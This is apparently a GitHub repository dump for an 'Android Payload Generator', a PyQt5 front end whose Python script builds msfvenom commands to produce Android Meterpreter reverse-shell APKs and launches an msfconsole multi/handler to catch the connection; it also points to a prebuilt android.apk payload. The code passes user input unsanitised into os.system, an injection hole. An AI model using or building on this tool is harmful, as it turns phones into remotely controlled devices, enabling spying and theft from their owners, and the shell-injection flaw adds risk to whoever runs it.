├── README.md
├── payload_generater.ui
├── payloads
    └── android.apk
├── qt_payload_gen.py
├── requirements.txt
└── sys


/README.md:
--------------------------------------------------------------------------------
 1 | # Android Payload Generator
 2 | 
 3 | This tool helps to generate android payload with the help of QT5. It has a cool and simple graphical user interface which will make generating payload and listening for reverse shell easier.
 4 | 
 5 | ![alt text](https://user-images.githubusercontent.com/14030703/82488946-e18afe80-9af1-11ea-9792-4b4a0e0aef03.png)
 6 | 
 7 | # Installation
 8 | 
 9 | Payload Generator requires [Qt5](https://doc.qt.io/qtforpython/) to run.
10 | 
11 | Install below dependencies.
12 | 
13 | ```sh
14 | pip3 install --user pyqt5  
15 | sudo apt-get install python3-pyqt5  
16 | sudo apt-get install pyqt5-dev-tools
17 | sudo apt-get install qttools5-dev-tools
18 | pip install -r requirements.txt
19 | ```
20 | 
21 | Run by
22 | 
23 | > python3 qt_payload_gen.py
24 | 
25 | ### Plugins
26 | 
27 | Payload generator is currently extended with the following plugins. Instructions on how to use them in your own application are linked below.
28 | 
29 | | Plugin | Url |
30 | | ------ | ------ |
31 | | MSFVenom | https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom |
32 | | qt5 | https://doc.qt.io/qtforpython/ |
33 | 


--------------------------------------------------------------------------------
/payload_generater.ui:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="UTF-8"?>
  2 | <ui version="4.0">
  3 |  <class>MainWindow</class>
  4 |  <widget class="QMainWindow" name="MainWindow">
  5 |   <property name="geometry">
  6 |    <rect>
  7 |     <x>0</x>
  8 |     <y>0</y>
  9 |     <width>596</width>
 10 |     <height>376</height>
 11 |    </rect>
 12 |   </property>
 13 |   <property name="windowTitle">
 14 |    <string>Android Payload Generator</string>
 15 |   </property>
 16 |   <widget class="QWidget" name="centralwidget">
 17 |    <layout class="QVBoxLayout" name="verticalLayout_2">
 18 |     <item>
 19 |      <layout class="QVBoxLayout" name="verticalLayout">
 20 |       <property name="spacing">
 21 |        <number>6</number>
 22 |       </property>
 23 |       <property name="sizeConstraint">
 24 |        <enum>QLayout::SetDefaultConstraint</enum>
 25 |       </property>
 26 |       <item>
 27 |        <widget class="QLabel" name="label">
 28 |         <property name="maximumSize">
 29 |          <size>
 30 |           <width>16777215</width>
 31 |           <height>30</height>
 32 |          </size>
 33 |         </property>
 34 |         <property name="text">
 35 |          <string>Choose Payload</string>
 36 |         </property>
 37 |        </widget>
 38 |       </item>
 39 |       <item>
 40 |        <widget class="QComboBox" name="payloadComboBox">
 41 |         <property name="maximumSize">
 42 |          <size>
 43 |           <width>16777215</width>
 44 |           <height>30</height>
 45 |          </size>
 46 |         </property>
 47 |        </widget>
 48 |       </item>
 49 |       <item>
 50 |        <widget class="QLabel" name="label_2">
 51 |         <property name="maximumSize">
 52 |          <size>
 53 |           <width>16777215</width>
 54 |           <height>30</height>
 55 |          </size>
 56 |         </property>
 57 |         <property name="text">
 58 |          <string>LHOST</string>
 59 |         </property>
 60 |        </widget>
 61 |       </item>
 62 |       <item>
 63 |        <widget class="QTextEdit" name="textHost">
 64 |         <property name="sizePolicy">
 65 |          <sizepolicy hsizetype="Expanding" vsizetype="Expanding">
 66 |           <horstretch>0</horstretch>
 67 |           <verstretch>50</verstretch>
 68 |          </sizepolicy>
 69 |         </property>
 70 |         <property name="minimumSize">
 71 |          <size>
 72 |           <width>0</width>
 73 |           <height>0</height>
 74 |          </size>
 75 |         </property>
 76 |         <property name="maximumSize">
 77 |          <size>
 78 |           <width>16777215</width>
 79 |           <height>30</height>
 80 |          </size>
 81 |         </property>
 82 |         <property name="inputMethodHints">
 83 |          <set>Qt::ImhNoAutoUppercase|Qt::ImhNoPredictiveText</set>
 84 |         </property>
 85 |         <property name="tabChangesFocus">
 86 |          <bool>true</bool>
 87 |         </property>
 88 |         <property name="lineWrapMode">
 89 |          <enum>QTextEdit::NoWrap</enum>
 90 |         </property>
 91 |         <property name="acceptRichText">
 92 |          <bool>false</bool>
 93 |         </property>
 94 |        </widget>
 95 |       </item>
 96 |       <item>
 97 |        <widget class="QLabel" name="label_3">
 98 |         <property name="maximumSize">
 99 |          <size>
100 |           <width>16777215</width>
101 |           <height>30</height>
102 |          </size>
103 |         </property>
104 |         <property name="text">
105 |          <string>LPORT</string>
106 |         </property>
107 |        </widget>
108 |       </item>
109 |       <item>
110 |        <widget class="QTextEdit" name="textPort">
111 |         <property name="sizePolicy">
112 |          <sizepolicy hsizetype="Expanding" vsizetype="Expanding">
113 |           <horstretch>0</horstretch>
114 |           <verstretch>0</verstretch>
115 |          </sizepolicy>
116 |         </property>
117 |         <property name="maximumSize">
118 |          <size>
119 |           <width>16777215</width>
120 |           <height>30</height>
121 |          </size>
122 |         </property>
123 |         <property name="inputMethodHints">
124 |          <set>Qt::ImhDigitsOnly</set>
125 |         </property>
126 |         <property name="tabChangesFocus">
127 |          <bool>true</bool>
128 |         </property>
129 |         <property name="lineWrapMode">
130 |          <enum>QTextEdit::NoWrap</enum>
131 |         </property>
132 |        </widget>
133 |       </item>
134 |       <item>
135 |        <widget class="QLabel" name="label_4">
136 |         <property name="maximumSize">
137 |          <size>
138 |           <width>16777215</width>
139 |           <height>30</height>
140 |          </size>
141 |         </property>
142 |         <property name="text">
143 |          <string>Payload Name</string>
144 |         </property>
145 |        </widget>
146 |       </item>
147 |       <item>
148 |        <widget class="QTextEdit" name="textName">
149 |         <property name="maximumSize">
150 |          <size>
151 |           <width>16777215</width>
152 |           <height>30</height>
153 |          </size>
154 |         </property>
155 |         <property name="tabletTracking">
156 |          <bool>true</bool>
157 |         </property>
158 |         <property name="lineWrapMode">
159 |          <enum>QTextEdit::NoWrap</enum>
160 |         </property>
161 |        </widget>
162 |       </item>
163 |       <item>
164 |        <widget class="QPushButton" name="btnGeneratePayload">
165 |         <property name="maximumSize">
166 |          <size>
167 |           <width>16777215</width>
168 |           <height>30</height>
169 |          </size>
170 |         </property>
171 |         <property name="baseSize">
172 |          <size>
173 |           <width>0</width>
174 |           <height>0</height>
175 |          </size>
176 |         </property>
177 |         <property name="text">
178 |          <string>Generate Payload</string>
179 |         </property>
180 |        </widget>
181 |       </item>
182 |       <item>
183 |        <widget class="QPushButton" name="btnListen">
184 |         <property name="minimumSize">
185 |          <size>
186 |           <width>0</width>
187 |           <height>30</height>
188 |          </size>
189 |         </property>
190 |         <property name="maximumSize">
191 |          <size>
192 |           <width>16777215</width>
193 |           <height>30</height>
194 |          </size>
195 |         </property>
196 |         <property name="text">
197 |          <string>Listen</string>
198 |         </property>
199 |        </widget>
200 |       </item>
201 |      </layout>
202 |     </item>
203 |    </layout>
204 |   </widget>
205 |   <widget class="QStatusBar" name="statusbar"/>
206 |   <widget class="QMenuBar" name="menuBar">
207 |    <property name="geometry">
208 |     <rect>
209 |      <x>0</x>
210 |      <y>0</y>
211 |      <width>596</width>
212 |      <height>25</height>
213 |     </rect>
214 |    </property>
215 |   </widget>
216 |  </widget>
217 |  <resources/>
218 |  <connections/>
219 | </ui>
220 | 


--------------------------------------------------------------------------------
/payloads/android.apk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/webnizam/android-payload-generator/43ec690bffad27cddfec3111db8f9fdcd2fb3e6a/payloads/android.apk


--------------------------------------------------------------------------------
/qt_payload_gen.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | from PyQt5 import QtCore, QtGui, QtWidgets
 3 | from PyQt5 import uic
 4 | from PyQt5.QtWidgets import QMessageBox
 5 | import os, subprocess
 6 | 
 7 | values = [
 8 |     'android/meterpreter/reverse_tcp',
 9 |     'android/meterpreter/reverse_http',
10 |     'android/meterpreter/reverse_https',
11 | ]
12 | 
13 | generate_base_command = 'msfvenom -p %s LHOST=%s LPORT=%d R > %s'
14 | listen_base_command = '''
15 |                         msfconsole -x "use exploit/multi/handler;\
16 |                                         set PAYLOAD %s;\
17 |                                         set LHOST %s;\
18 |                                         set LPORT %d;\
19 |                                         run"
20 |                       '''
21 | 
22 | 
23 | def show_message(title='Error', info="", text='An Error Occured'):
24 |     msg = QMessageBox()
25 |     msg.setIcon(QMessageBox.Critical)
26 |     msg.setText(text)
27 |     msg.setInformativeText(info)
28 |     msg.setWindowTitle(title)
29 |     msg.exec_()
30 | 
31 | class MainWindow(QtWidgets.QMainWindow):
32 | 
33 |     def __init__(self, *args, **kwargs):
34 |         super().__init__(*args, **kwargs)
35 |         uic.loadUi("payload_generater.ui", self)
36 |         self.btnGeneratePayload.clicked.connect(self.click_generate)
37 |         self.btnListen.clicked.connect(self.click_listen)
38 |         self.payloadComboBox.addItems(values)
39 |         self.output_dir = str(os.getcwd())+'/payloads/'
40 |         print(self.output_dir)
41 |         if not os.path.exists(self.output_dir):
42 |             os.makedirs(self.output_dir)
43 | 
44 |     def click_generate(self):
45 |         try:
46 |             host = str(self.textHost.toPlainText())
47 |             host = host.replace('http://', '')
48 |             host = host.replace('https://', '')
49 |             port = str(self.textPort.toPlainText())
50 |             payload_name = str(self.textName.toPlainText())
51 |             if 'apk' not in payload_name:
52 |                 payload_name = payload_name+'.apk'
53 |             payload_type = str(self.payloadComboBox.currentText())
54 |             if host and port and payload_name and payload_type:
55 |                 port = int(port)
56 |                 output_path = self.output_dir+payload_name
57 |                 command = generate_base_command % (payload_type, host, port, output_path)
58 |                 print(command)
59 |                 os.system(command)
60 |                 show_message(title='Success', text='Successfully generated payload, please find it at below path', info=self.output_dir)
61 |             else:
62 |                 show_message(text='All fields are mandatory, please click generate after putting those.')
63 | 
64 |         except Exception as e:
65 |             print(e)
66 |             show_message(info=str(e))
67 | 
68 |     def click_listen(self):
69 |         try:
70 |             host = str(self.textHost.toPlainText())
71 |             host = host.replace('http://', '')
72 |             host = host.replace('https://', '')
73 |             port = str(self.textPort.toPlainText())
74 |             payload_type = str(self.payloadComboBox.currentText())
75 |             if host and port and payload_type:
76 |                 port = int(port)
77 |                 command = listen_base_command % (payload_type, host, port)
78 |                 subprocess.call(["xterm", '-e', command])
79 |                 # subprocess.call(['xterm', '-hold', '-e', command])
80 |                 print(command)
81 |                 os.system(command)
82 |             else:
83 |                 show_message(text='All fields are mandatory, please click generate after putting those.')
84 | 
85 |         except Exception as e:
86 |             print(e)
87 |             show_message(info=str(e))
88 | 
89 | 
90 | def main():
91 |     app = QtWidgets.QApplication(sys.argv)
92 |     main = MainWindow()
93 |     main.show()
94 |     sys.exit(app.exec_())
95 | 
96 | if __name__ == '__main__':
97 |     main()
98 | 


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | PyQt5==5.14.2
2 | pyqt5-tools==5.14.2.1.7b3
3 | 


--------------------------------------------------------------------------------